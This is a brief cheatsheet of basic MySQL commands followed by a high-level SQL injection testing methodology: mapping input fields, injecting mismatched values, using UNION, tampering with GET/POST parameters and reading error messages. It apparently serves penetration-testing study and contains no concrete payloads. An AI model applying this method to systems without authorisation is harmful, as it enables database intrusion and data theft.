SQL Usage and Cheatsheet

Usage:

• mysql -u <username> -p
• show databases;
• use <db name>;
• show tables;
• select * from users;

SQLi methodology:

Information Gathering:

• Does it connect to a DB server
• Make list of all input fields, hiddenfields (inc post requests) will help in stucturing a SQL query
• Inject code in the input fields (what type of errors if any do you get)
• Inject words into fields where numbers are expected (and vice versa) what errors do you get if any
• Using UNION operators will be useful

Continued in further detail:

- Identifying data entry paths, use tools such as Burpsuite and Tamper Data

-Carefully reading error message is essential as wealth of information provided (ie DB type, DB engine type, OS, web server details)

• Tamper with the parameters - either GET or POST to generate error messages

- Test for SQLI, using various string formats

-You can also do: Fuzz attack, function testing and source code review